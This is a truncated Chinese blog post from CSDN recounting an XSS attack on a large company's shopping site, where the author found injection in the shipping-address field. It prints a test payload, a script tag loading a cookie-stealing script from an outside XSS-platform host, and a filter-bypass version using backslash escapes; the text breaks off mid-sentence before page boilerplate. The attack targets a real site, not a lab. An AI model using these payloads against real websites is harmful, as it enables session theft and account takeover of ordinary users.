【渗透实例】记录一次XSS渗透过程

本文记录了一次XSS渗透过程,首先在目标网站的编辑收货地址处发现XSS漏洞,然后通过构造带转义字符的XSS代码成功绕过平台过滤,实现了与XSS平台的连接。虽然能获取用户Cookie等信息,但由于触发条件限制,实际利用价值有限。作者探讨了漏洞可能的其他利用价值,并欢迎读者分享想法。
摘要由CSDN通过智能技术生成

0x01 找到存在XSS的位置

没什么技巧,见到框就X,功夫不负有心人,在目标网站编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。

使用的XSS代码:<img src=1 onerror=alert(1)
#因为CSDN编辑器的原因,这里括号不能补全,使用该XSS的时候alert(1)后要加上右括号以补全前面的左括号。

在这里插入图片描述

0x02 构造XSS代码连接到XSS平台

XSS平台给我们的XSS代码是这样的:

</tExtArEa>'"><sCRiPt sRC=https://xss8.cc/3Ri4></sCrIpT>

在这里插入图片描述
直接插入的话会提示参数非法,经过多次尝试,最后发现该平台会对双引号、script字符进行识别过滤,大小写会被过滤,于是尝试插入下面的语句:

</tExtArEa>'\"><\sCRiPt sRC=https://xss8.cc/3Ri4></\sCrIpT>

这条代码比上面平台给的XSS代码的多了几个 “\”,也就是转义字

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值